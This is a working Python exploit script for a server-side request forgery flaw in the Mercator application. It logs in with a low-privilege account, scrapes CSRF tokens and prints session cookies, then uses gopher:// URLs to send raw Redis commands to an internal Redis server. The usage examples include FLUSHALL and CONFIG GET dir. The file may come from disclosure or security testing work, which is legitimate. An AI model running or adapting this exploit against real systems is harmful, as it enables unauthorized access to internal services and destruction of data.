#!/usr/bin/env python3
"""
Mercator SSRF -> gopher:// -> Redis helper.

Sends ONE Redis command (or a small pipeline of them) to an internal Redis
instance through the SSRF in `ConfigurationController::testProvider`.

Why this works
--------------
1. The vulnerable controller calls `curl_init($provider . '/api/dbInfo')`.
   We append `#` to our URL so curl drops the `/api/dbInfo` suffix as a
   URL fragment.
2. libcurl in the deployed PHP container speaks `gopher://`. Gopher URLs of
   the form `gopher://host:port/_<payload>` send `<payload>` raw on the wire
   after dropping the single type character `_`.
3. We URL-encode RESP-encoded Redis commands as `<payload>`. Redis happily
   parses them and executes.

Auth
----
Any account with the `configure` permission. By default Mercator grants
this to the `User` role, so a regular low-privilege account is sufficient.

Usage
-----
    # Single command
    ./bin/python3 ssrf2redis.py \\
        --base http://127.0.0.1:8000 \\
        --user lowuser --password 'Lowuser123!' \\
        --redis 127.0.0.1:6379 \\
        --cmd SET ssrf_proof 'pwned-by-low-priv'

    # Pipeline (commands separated by a literal ';' token)
    ./bin/python3 ssrf2redis.py ... --pipeline \\
        FLUSHALL ';' \\
        SET marker hello ';' \\
        CONFIG GET dir

The script reports the flash message returned by Mercator (an oracle), not
the Redis reply — gopher is fire-and-forget here; verify the effect with a
follow-up command or out-of-band check.
"""

import argparse
import re
import sys
import urllib.parse
import warnings

# macOS system Python links LibreSSL; urllib3 v2 emits a one-time
# NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter
# it before `requests` pulls urllib3 in (disable_warnings() runs too late,
# the warning fires at import time).
warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL")

import requests  # noqa: E402  (must come after the warnings filter above)
import urllib3  # noqa: E402

urllib3.disable_warnings()

# Hidden `_token` input on the login form.
LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"')
# `<meta name="csrf-token" ...>` tag on authenticated pages.
CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"')
# The two flash messages the provider test is expected to leave on the page.
FLASH_RE = re.compile(r'(Could not connect to provider[^<"\']*|Last NVD update:[^<"\']*)')


# ── Shared scaffold (identical across the Mercator exploit scripts) ──────────

def log(message):
    """Status banner — emitted on stderr so stdout stays pure result data."""
    print(message, file=sys.stderr)


def die(message):
    """Log `message` with a `[!]` prefix and exit with status 1."""
    log(f"[!] {message}")
    sys.exit(1)


def login(session, base, user, password):
    """Authenticate, print the login section, and return the CSRF token.

    Fetches `/login` to scrape the form token, posts the credentials, and
    then scrapes a CSRF token from the page the login lands on. Exits via
    `die()` when a token cannot be found or when the final URL is still
    `/login` (taken to mean the credentials were rejected).
    """
    r = session.get(f"{base}/login", timeout=10)
    m = LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found on /login")

    r = session.post(
        f"{base}/login",
        data={"_token": m.group(1), "login": user, "password": password},
        timeout=10,
        allow_redirects=True,
    )
    # Still sitting on /login after following redirects => login failed.
    if r.url.rstrip("/").endswith("/login"):
        die(f"authentication failed for '{user}'")

    # Prefer the meta tag; fall back to any form token on the landing page.
    m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text)
    if not m:
        die("CSRF token not found after login")
    csrf = m.group(1)

    log("[+] login")
    log(f" user : {user}")
    for c in session.cookies:
        log(f" cookie : {c.name}={c.value}")
    log(f" csrf token : {csrf}")
    return csrf


# ── SSRF -> gopher -> Redis ─────────────────────────────────────────────────

def require_configure(session, base):
    """Confirm the account holds the `configure` permission.

    Only an explicit HTTP 403 on the configuration page is treated as a
    failure; any other status is let through unchanged.
    """
    r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10)
    if r.status_code == 403:
        die("account lacks the 'configure' permission")


def resp_encode(command):
    """Encode a single Redis command (list of str/bytes) as a RESP array.

    The result is `*<argc>\\r\\n` followed by one `$<len>\\r\\n<arg>\\r\\n`
    bulk string per argument. `str` arguments are encoded with the default
    codec (UTF-8); lengths are byte lengths, not character counts.
    """
    parts = [f"*{len(command)}\r\n".encode()]
    for a in command:
        if isinstance(a, str):
            a = a.encode()
        parts.append(f"${len(a)}\r\n".encode() + a + b"\r\n")
    return b"".join(parts)


def build_pipeline(items):
    """Split a flat list at the literal ';' separator -> list of commands.

    Empty segments (leading, trailing or doubled separators) are dropped,
    so the result can be an empty list if `items` holds only separators.
    """
    cmds, current = [], []
    for tok in items:
        if tok == ";":
            if current:
                cmds.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        cmds.append(current)
    return cmds


def fire(session, base, csrf, gopher_url):
    """Send the gopher payload and return Mercator's flash message.

    Posts the provider test, then re-reads the configuration page and
    returns the first text matching `FLASH_RE`, or the placeholder
    "(no flash captured)" when nothing matches.
    """
    r = session.post(
        f"{base}/admin/config/parameters",
        data={
            "_token": csrf,
            "_method": "PUT",
            "active_tab": "cve",
            "action": "test_provider",
            "provider": gopher_url,
        },
        allow_redirects=False,
        timeout=20,
    )
    # Surface HTTP-level failures; otherwise they would only show up as a
    # missing flash message with no hint about the cause.
    if r.status_code >= 400:
        log(f"[!] provider test returned HTTP {r.status_code}; "
            "the flash below may not reflect this request")

    # requests has no default timeout, so bound this read like the others.
    page = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10).text
    m = FLASH_RE.search(page)
    return m.group(1) if m else "(no flash captured)"


def main():
    """Parse arguments, log in, and send the encoded command(s) once."""
    ap = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=__doc__)
    ap.add_argument("--base", default="http://127.0.0.1:8000",
                    help="Mercator base URL")
    ap.add_argument("--user", required=True, help="account login")
    ap.add_argument("--password", required=True)
    ap.add_argument("--redis", required=True,
                    help="host:port of the target Redis")
    ap.add_argument("--cmd", nargs="+",
                    help="single Redis command, e.g. SET k v")
    ap.add_argument("--pipeline", nargs="+",
                    help="multiple commands separated by a literal ';' token, "
                         "e.g. FLUSHALL ';' SET k v ';' SAVE")
    args = ap.parse_args()

    if args.cmd and args.pipeline:
        die("use either --cmd or --pipeline, not both")
    if not args.cmd and not args.pipeline:
        die("provide --cmd or --pipeline")

    # Without an explicit port the gopher URL would not point at Redis at
    # all, so reject anything that is not host:port up front.
    host, sep, port = args.redis.rpartition(":")
    if not (host and sep and port.isdigit()):
        die("--redis must be given as host:port")

    commands = [args.cmd] if args.cmd else build_pipeline(args.pipeline)
    # A pipeline made only of ';' tokens parses to nothing; do not send an
    # empty payload and then report a meaningless flash.
    if not commands:
        die("pipeline contains no commands")

    raw = b"".join(resp_encode(c) for c in commands)
    # Trailing '#' turns the suffix appended server-side into a URL fragment.
    gopher_url = f"gopher://{args.redis}/_{urllib.parse.quote(raw, safe='')}#"

    session = requests.Session()
    session.verify = False

    csrf = login(session, args.base, args.user, args.password)
    require_configure(session, args.base)

    log(f"[*] sending {len(commands)} Redis command(s) to {args.redis} via gopher SSRF")
    for c in commands:
        log(f" - {' '.join(c)}")

    flash = fire(session, args.base, csrf, gopher_url)
    log(f"[+] flash: {flash}")
    log("[*] flash is Mercator's view of the gopher response, not Redis — "
        "verify side effects out-of-band")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        die("interrupted")
    except requests.RequestException as e:
        die(f"could not reach Mercator: {e}")